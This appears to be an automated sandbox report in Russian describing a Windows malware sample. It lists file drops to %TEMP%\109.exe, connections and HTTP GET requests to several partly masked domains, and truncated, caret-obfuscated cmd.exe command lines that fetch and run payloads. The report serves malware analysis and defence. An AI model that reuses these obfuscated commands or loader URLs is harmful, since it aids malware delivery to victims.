Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\109.exe
Удаляет следующие файлы
- %TEMP%\109.exe
Сетевая активность
Подключается к
- 'co###page.com':80
- 'bu###rbean.se':80
- 'bo####ue-amour.jp':80
- 'bo####ue-amour.jp':443
- 'bi###nomad.com':80
- 'we#####designgarden.com':80
- 'we#####designgarden.com':443
TCP
Запросы HTTP GET
- http://co###page.com/fLCt
- http://bu###rbean.se/KKHaZ8Oh
- http://bo####ue-amour.jp/958Jf
- http://bi###nomad.com/wp-content/jBN92RTl
- http://we#####designgarden.com/fmkE
Другие
- 'bo####ue-amour.jp':443
- 'we#####designgarden.com':443
UDP
- DNS ASK co###page.com
- DNS ASK bu###rbean.se
- DNS ASK bo####ue-amour.jp
- DNS ASK bi###nomad.com
- DNS ASK we#####designgarden.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wZRiwhJfF uoGFDZmwViVVuSwozQbK fiwFOrHBht & %co^m^S^p^E^c% /c ^c^M^d; ; ; /^V^ ^ ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ; ; /V ; ; /r" ;; (SE^T ^ Wt^b=nT1 1Hc ^aC5^ u^GQ HK^v nD0^ 5Jk L0^8 Nli ^MqW ^U2d 8zU ^e1I EKF ^aox cfg G^AZ^ 1^ym}^cAh}AKM{9^20hVR^vcrbBtdQU^azr8^c^5vL}P6T; s8k^7Jia6ov^e^E^sY^rT^Xob8...
